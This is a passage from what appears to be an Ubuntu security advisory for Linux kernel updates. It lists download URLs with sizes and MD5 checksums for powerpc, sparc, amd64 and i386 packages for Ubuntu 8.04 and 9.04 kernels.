http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    44828 a6ad64ce75120444ae7f77eb185f8341\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    40932 b70c6c4ee3bad7a338ef382e8a3cdc13\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   704802 2482fd05dab21510ca1d1cb12255f28d\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   771068 65cf59f3797041350a9066d561c0e064\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   243302 dafec4c170c159b89196ce5a1b3728c1\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   246242 3efe238d1ffb86bb475953cceb77ed8a\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    69164 d97c8f78522a9bdc7b19f9d9eddef075\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   132596 1e4fd78863d1c805c3fbfef2adabc1cf\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    70242 46c97ad3a53ccee9e557521ef833ade4\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    77458 a7d9a6a35e41c3a8e7552471f78f2de6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   146272 074f4acf53ffc60e19b36d4360a6872f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   165012 02994ab52ccb8b88c8a85954c04c214a\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   388012 3d1d5851c82d9b38f7764a2183ec6b72\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   350478 d5c91796ae6b0f20f52cab3328f9b233\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  2431708 6b69540ac9168a1068af1c829e6ad807\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  3474134 efd7274967d4c93a4b4f757b8b663f1b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5:   654288 16629f59f727a0d5d1ce1a2f178fdbdc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5:   659270 3acd9fa19531e93a19b79b92946742fe\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb\n      Size/MD5:   654194 19fb231dfad96a5202c96e0a963608a6\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5: 20175768 245a4d510c48479ca8608d064bb4d0f1\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5: 21380060 4c2463eeb9eec0f53a8336ffea5d2f37\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb\n      Size/MD5: 19950242 58918c61f50c52423dde5bb0cfea337e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_powerpc.deb\n      Size/MD5:   699320 f121a6d0897b8a3e3570355ad721475f\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   266748 96cc9a56b70590f6ef9cb4f42abd9f4c\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   307734 2a8ec116cdc2b993d54831e547d3cfe4\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   192248 ae395f02a06c83624393880a1c8bc755\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   201694 0523582031686284be72e9516eb874ed\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   272066 97f5240c866f23e18620876700e08bd5\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   306006 a09ded2fdc08a8b4fd286d5a732de719\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  1807806 f968364fcce3f3e06fe0229f9ad00400\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  2119512 8826a9667e0813ad11f13ef49ed0c9ba\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   235184 4d42dbe3fee5610fefc492c84f82f01d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   225400 72d96411968df5bb24b6c3409111f368\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   170442 65ea470d4661896774e2b17744bde9ea\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   199750 8e539809543d9b39931c2f9c0b608fd3\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   117952 9c0be00ccf310652a819d67e7fecbbbc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   139264 366dd0c02e403ef16c9da1ed940336bb\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    45374 7da2780fd97a9efdb2891c4cd3dbb611\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    46836 f96d04782ea762bb25c5b7fa13927742\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    51136 7eeb8c67107d09cca5d6ec53b4e0e640\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    60300 75caefd9be900faf4d7bd665e0a87e49\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    74182 2b8011cab437a41dc77b94b88e469222\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    87214 134a0a4d60e3a4d00ad71d8a38a00054\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    76092 ad9b456136a6e9bad3004f4e618dbcca\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    30230 83682f80fc1250d73ca5766262c8cf8e\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:     8488 6726b989a4df2541daca42af39d3a30b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    10030 4812e4833e0e4b3ca8e55079cd13d7ff\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    57440 d72f21d71d83cb31c79aa785a6c158a4\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    68744 0276d8aa4abc940cae72d4451ba65cdc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   101186 a3d4b7bea0440fcd1475bc292cece983\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   147822 372e114f4f7becea140fa5f33851d694\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  1565814 f4456b5f007c8e045f81e6de0ea25f99\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  1514592 726d8053f7f1ddebe305118ee429a5c2\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    76668 a8fe769d492687b7b0e3ae95e1f28038\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    85974 0aa16271f113ef2bb68b07dd5e387800\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    12710 dac27b9a6eed7ad24e351060e8b2858f\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    14558 ec5ed3428e4b13a483d2ff19cff1ccfc\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   450810 4260e241f3f0cb6735739ccea2e70cda\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   505340 18d9294716dcdba902081c38ae39a676\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    83696 1ad62154f4910af7748784cc71c8ec39\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   108846 89b0ef22256773f155bd3d3868dde5cf\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    59576 50a041d5ddbcac27bae81c81a94584e6\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    71726 6be6331d6cec8cdcfb63a25a1d94d0c6\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    42442 750e7a8fbcf37e4f1e18d75952056d6d\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    91778 ae78c7f7ed5677eadcd2bbd04e12e624\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   587170 b8ce9c8d08ad3d2d4527e0ac285a2e85\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   171076 70d9840d79c7d897510c19812c849109\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    22356 684c85bec9286e7c3364cd7e7d20f056\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    46052 ca2fe0707c599d22956dfb3fc8abc724\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   152976 0d22680968c277f76a4001889af0431f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:  2135604 1b0f5a9cde179230c1166358c726305b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb\n      Size/MD5:   567336 5eec7e6775fe7fea52ca71b52f4de8c3\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb\n      Size/MD5:   565774 d5ff9b03b0d4b52aa4b462e9d3b536d9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb\n      Size/MD5: 14098838 83993d0248f289169a7afef405666fbc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb\n      Size/MD5: 13833014 504a7d30fc2f014e930eb66bfa369485\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_sparc.deb\n      Size/MD5:   754240 83b808eeb2d8b4061ddf9d268e44171a\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   270056 98f38a0933d936d9aa8112fb6a8e2f79\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   190354 c4600cac5d626ddfa61d83a1ec671247\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   263026 a7df05507a97bf05575bfe742c1f7fa5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:  1386390 54a61a95d39edbcc445094f29c42f262\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   175414 69911cef4dd5a0d3d030a528ce8457b9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   122098 a0c2adf687a51bbe829adb835ecb71ee\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    40394 3c68e727d9f14a708d9ffc7f1bbe3aff\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    48058 19adf9ec3c25c920295662c53f3dda27\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:     8696 bb826a025cd7b1e9cd679c35c6126648\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    60508 4afc2631d8b1f65d02491233d5ccda2e\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   106836 b422f1235cb15f81230d03e9b3bdb4e1\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:  1002042 9b12e59032066f6fe401f01ee248cbda\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:     9518 b89c5ead0ec11c36566524fe1a6f544e\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   391832 a484119637039fe91af1d8bbd8b320aa\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    75926 8ad4b544689a8fee5dc03630477ca40c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.diff.gz\n      Size/MD5:  7408064 bf077530cc28fc2c8ca7f9ebc05eed66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.dsc\n      Size/MD5:     3175 c72ff80106672ba9fe2b235ed9a26224\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-19.61_all.deb\n      Size/MD5:  3637802 0071d076650095f26837d5a5dedd2145\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19_2.6.28-19.61_all.deb\n      Size/MD5:  8702074 9443d9c2687b48b786cb25d72fb485a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-19.61_all.deb\n      Size/MD5: 57052608 2e0d28a7e74ae69fa47a6e6f250948a0\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   234610 23fec831e3f61298baa06636eceedb01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    44118 4a5fac5654db234e70a2e9eaccbf4285\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    43320 9952d12ff6a86714d06bfcf4bc9e4440\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    51118 7f9136aa3cb5b1041cf0551ddef98511\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    90086 f2df406121a67d4e0a47175ec1d71d9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    38016 d766f9f96987f7493d4fc61e591a8b33\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   521640 fe11a00a5429edfe67d479e8d825a39b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   125832 b4d69c3d7c5c847d8aa24d837db44486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    58072 68d73aff5009f5d5040372f2a46c49e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   312522 221708988c790d5e0fdbc477aaa81323\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:  3870958 c7c36beae2f7bf5930443ed3f6fddeb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_amd64.deb\n      Size/MD5:   690350 78eff761f3de3ca6b6a5d787b0913386\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_amd64.deb\n      Size/MD5:   689874 2f16c0b044e2f930a6de88d26682a404\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_amd64.deb\n      Size/MD5: 24343062 cfe2467fe5ca7affab65e8735c698df5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_amd64.deb\n      Size/MD5: 24339190 440cbba0ae0f1b19d0a68ee7499ca3ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_amd64.deb\n      Size/MD5: 10552344 058b8ed0770e4aa1df480e174f857778\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_amd64.deb\n      Size/MD5:   767088 f35f8e695c44c813079736c9c17bd5e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   215202 fcf462d6720a7273ee02c49782e83b13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   189510 9b19fb1abe93c181fe5fda8e72b8cd26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    29406 6288043ea717a7305dc8510cd2f421e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   274494 036b1935bbceccd31a7ed7e41f473f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:  1933878 13697cd495d281f48696d983541ffe7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   163480 8de928fc197b8b89ef1c7750a38b0d76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   194830 74b0f571685be779768609c16a414346\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   153010 3f9d7d19adf9afb4419a80ad04231009\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    36498 fd7232b8dcf13ff08280ca63caeae302\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:     5838 1cc67d1a6c420276e6f59db3ed9942c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    72150 a499b73933f58ec19e04b6428fb82185\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    22718 56724a5b7bcc91aff7be15700c0a82ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:     8874 a4f0e53f6b6d2cacf54c6a9ac9eab37c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    47442 b366ca0d5084bac531ddfbb50a9d51a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    15662 a0d315f845d9b5688dd17954a62f9d92\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:  1273634 e0047421d0cb50d5b39c75c97274697a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    47210 8ea312e79dd8c391c34b6b69cd257977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    72702 c6ffab61cbfcfdc2e32cbf60f1d4958a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   126982 d6ede00cbf90e3b77fb8472fb3a9ee2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    13472 d48c09cb3270f0372ba5adfbba467306\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   215872 98aa4e99386167781b23b5504cbc8591\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    46666 ede37f43ef40b34f9d77fc4640514651\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    41356 cb2e3f87cf5642a12835a48f2f7efa8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    47404 aeaca1593385350dc704f57aaf625b73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    86924 5ea2819a5c30ce4c89a2bce2bd4627aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    33574 2cb4c345fe2fb221897102c5014d2017\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   525756 f090c1ccf69ddb2820186927c85dcd98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   125642 86e82e5dd9d4f57969d66c72ec5f41eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    54880 6e13577469a187fece4e004a80668b48\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   301354 a8a087c11396b663d52e6fbb2fc419e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:  3744732 3bf841c6e53f9a9d6c352609cd21570b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_i386.deb\n      Size/MD5:   674722 ae9bf80ad2a72a2eab03a182d0b076ec\n    